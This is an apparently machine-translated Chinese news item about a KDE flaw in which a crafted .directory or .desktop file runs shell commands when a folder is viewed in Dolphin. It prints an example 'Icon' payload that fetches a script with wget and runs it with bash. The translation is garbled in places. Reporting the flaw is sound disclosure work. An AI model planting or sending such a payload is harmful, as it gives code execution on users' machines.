查看文件列表时的 KDE 代码执行漏洞

在 KDE 中 已确定 漏洞,当用户查看包含专门设计的“.desktop”和“.directory”文件的目录或存档时,攻击者可以执行任意命令。 攻击需要用户简单地查看 Dolphin 文件管理器中的文件列表、下载恶意桌面文件或将快捷方式拖到桌面或文档中。 该问题在当前版本的库中表现出来 KDE框架5.60.0 及旧版本,直至 KDE 4。该漏洞仍然存在 遗体 未修正的 (未分配 CVE)。

该问题是由 KDesktopFile 类的错误实现引起的,该类在处理“Icon”变量时,没有适当的转义,将值传递给 KConfigPrivate::expandString() 函数,该函数执行 shell 特殊字符的扩展,包括处理字符串“$(..)”作为要执行的命令。 与XDG规范的要求相反,实施 披露 shell 构造是在不分离设置类型的情况下生成的,即不仅在确定要启动的应用程序的命令行时,而且在指定默认显示的图标时也是如此。

例如,要攻击 够了 向用户发送一个 zip 存档,其中包含一个包含“.directory”文件的目录,例如:

[桌面条目]类型=目录
图标[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)

当您尝试在 Dolphin 文件管理器中查看存档的内容时,将下载并执行脚本 https://example.com/FILENAME.sh。


来源: opennet.ru

添加评论